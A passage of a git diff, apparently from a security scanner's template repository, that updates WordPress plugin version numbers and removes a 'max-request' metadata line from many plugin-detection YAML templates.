http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - http/technologies/wordpress/plugins/loginpress.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 208 files changed, 8 insertions(+), 208 deletions(-) diff --git a/helpers/wordpress/plugins/duplicate-page.txt b/helpers/wordpress/plugins/duplicate-page.txt index 689f7fbd33..ae6e65bd96 100644 --- a/helpers/wordpress/plugins/duplicate-page.txt +++ b/helpers/wordpress/plugins/duplicate-page.txt @@ -1 +1 @@ -4.5.2 \ No newline at end of file +4.5.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt index b219ff1d83..0c9149e71b 100644 --- a/helpers/wordpress/plugins/google-site-kit.txt +++ b/helpers/wordpress/plugins/google-site-kit.txt @@ -1 +1 @@ -1.108.0 \ No newline at end of file +1.109.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/header-footer-elementor.txt b/helpers/wordpress/plugins/header-footer-elementor.txt index 3b98ba64c2..ff1bb9e158 100644 --- a/helpers/wordpress/plugins/header-footer-elementor.txt +++ b/helpers/wordpress/plugins/header-footer-elementor.txt @@ -1 +1 @@ -1.6.15 \ No newline at end of file +1.6.16 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index 85b3175412..d96f69cdd5 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.1.13 \ No newline at end of file +3.1.14 \ No newline at end of file diff --git a/helpers/wordpress/plugins/malcare-security.txt b/helpers/wordpress/plugins/malcare-security.txt index 99b01b7799..50c97d61b5 100644 --- a/helpers/wordpress/plugins/malcare-security.txt +++ b/helpers/wordpress/plugins/malcare-security.txt @@ -1 +1 @@ -5.24 \ No newline at end of file +5.25 \ No newline at end of file diff --git a/helpers/wordpress/plugins/megamenu.txt b/helpers/wordpress/plugins/megamenu.txt index acf9bf09db..06eda28ac7 100644 --- a/helpers/wordpress/plugins/megamenu.txt +++ b/helpers/wordpress/plugins/megamenu.txt @@ -1 +1 @@ -3.2.2 \ No newline at end of file +3.2.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 0729fcac88..ecaaf9200e 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -14.1.6 \ No newline at end of file +14.1.6.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpvivid-backuprestore.txt b/helpers/wordpress/plugins/wpvivid-backuprestore.txt index 460c117dcf..3f7b39b948 100644 --- a/helpers/wordpress/plugins/wpvivid-backuprestore.txt +++ b/helpers/wordpress/plugins/wpvivid-backuprestore.txt @@ -1 +1 @@ -0.9.90 \ No newline at end of file +0.9.91 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: - max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 06cfd4950b..97f1d8c18f 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: - max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 90aa5881fd..10f104f2c7 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: - max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 1bf337da6c..8addc28ded 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: - max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 7cec152555..2e579621ac 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 8a4b6133cd..41e297ffeb 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: - max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index cfa2e3d080..0dd8686ec3 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: - max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a92d9bde4e..359671f3bd 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: - max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 59144c7dd5..116e0c420a 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: - max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index df06ba2f35..dc4703ef8d 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: - max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 2a79d529cc..1426ac3ef2 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: - max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 556a113acc..78d1651ff4 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: - max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 58d9a9d738..f7219b373d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: - max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6c9c485079..f688a68f72 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: - max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 7631e87d78..00e95c4263 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: - max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index c7daa26ac6..212b2b13c4 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: - max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 68767e4dce..6318392c5c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: - max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 073618936d..e1a2a186e0 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: - max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 6aabc19e9f..23614882a7 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: - max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index ac80e4f31b..85965337cb 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: - max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 15d7a24755..33d903a1b4 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: - max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 40ccc15b27..3c6f8f287b 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: - max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 1fad3cee08..c3b630cde2 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: - max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index ebe4ee41a7..5c8ce709b6 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: - max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 5c32110e0e..aea47b9e84 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: - max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 09c2e2f360..78c584c388 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: - max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 1a2e8beb3e..2c80d09c27 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: - max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 706145493c..4b1b3a8754 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: - max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index cf6a6ee635..06ad83bdf7 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: - max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index c039765929..b20666268f 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: - max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index a2c92dff4b..b2a097bfe7 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: - max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index 41b5d6c854..c71fa258af 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: - max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index cca31cc3a9..5a98e67597 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: - max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index ff9c0a49ce..4463174203 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: - max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git 